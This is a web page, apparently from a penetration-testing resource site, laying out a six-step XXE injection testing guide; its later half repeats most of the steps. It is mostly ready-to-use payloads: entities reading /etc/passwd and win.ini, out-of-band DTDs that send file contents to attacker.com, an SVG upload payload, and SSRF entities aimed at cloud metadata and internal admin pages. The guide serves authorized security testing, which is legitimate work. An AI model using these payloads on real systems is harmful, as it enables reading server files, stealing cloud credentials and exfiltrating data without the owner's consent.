Home GuidesXXE Testing Guide

XXE Testing Guide

Learn how to test for XML External Entity (XXE) injection to read local files, perform SSRF, and exfiltrate data via out-of-band channels.

Advanced

6 steps14 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Identify XML input points

Find endpoints that accept XML data: SOAP APIs, XML-RPC, file uploads (DOCX, XLSX, SVG), and any Content-Type: application/xml or text/xml requests. Check if the server parses XML with DTD processing enabled.

Example payloads

Content-Type: application/xml

Content-Type: text/xml

.docx, .xlsx, .svg file uploads

Test basic XXE for file retrieval

Define an external entity referencing a local file and include it in the XML body. If the file contents appear in the response, the application is vulnerable to classic XXE.

Example payloads

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><root>&xxe;</root>

Test for blind XXE via out-of-band

If entity contents are not reflected, use out-of-band (OOB) techniques. Define an external entity that makes an HTTP or DNS request to your controlled server to confirm the vulnerability.

Example payloads

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe-test">]>

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>

Exfiltrate data via parameter entities

Use parameter entities to read file contents and exfiltrate them via HTTP. Host a malicious DTD on your server that defines entities to extract and send data.

Example payloads

<!ENTITY % file SYSTEM "file:///etc/hostname">

<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">

%eval; %exfiltrate;

Test for XXE via file uploads

Upload crafted SVG, DOCX, or XLSX files containing XXE payloads. Office documents are ZIP archives containing XML files that may be parsed server-side.

Example payloads

<!-- SVG with XXE -->
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg>&xxe;</svg>

Modify [Content_Types].xml in DOCX/XLSX

Attempt SSRF via XXE

Use XXE to perform server-side requests to internal services and cloud metadata endpoints, combining XXE impact with SSRF capabilities.

Example payloads

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">

<!ENTITY xxe SYSTEM "http://192.168.1.1:8080/admin">

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Identify XML input points

Example payloads

Content-Type: application/xml

Content-Type: text/xml

.docx, .xlsx, .svg file uploads

Test basic XXE for file retrieval

Define an external entity referencing a local file and include it in the XML body. If the file contents appear in the response, the application is vulnerable to classic XXE.

Example payloads

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><root>&xxe;</root>

Test for blind XXE via out-of-band

If entity contents are not reflected, use out-of-band (OOB) techniques. Define an external entity that makes an HTTP or DNS request to your controlled server to confirm the vulnerability.

Example payloads

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe-test">]>

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>

Exfiltrate data via parameter entities

Use parameter entities to read file contents and exfiltrate them via HTTP. Host a malicious DTD on your server that defines entities to extract and send data.

Example payloads

<!ENTITY % file SYSTEM "file:///etc/hostname">

<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">

%eval; %exfiltrate;

Test for XXE via file uploads

Upload crafted SVG, DOCX, or XLSX files containing XXE payloads. Office documents are ZIP archives containing XML files that may be parsed server-side.

Example payloads

<!-- SVG with XXE -->
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg>&xxe;</svg>

Modify [Content_Types].xml in DOCX/XLSX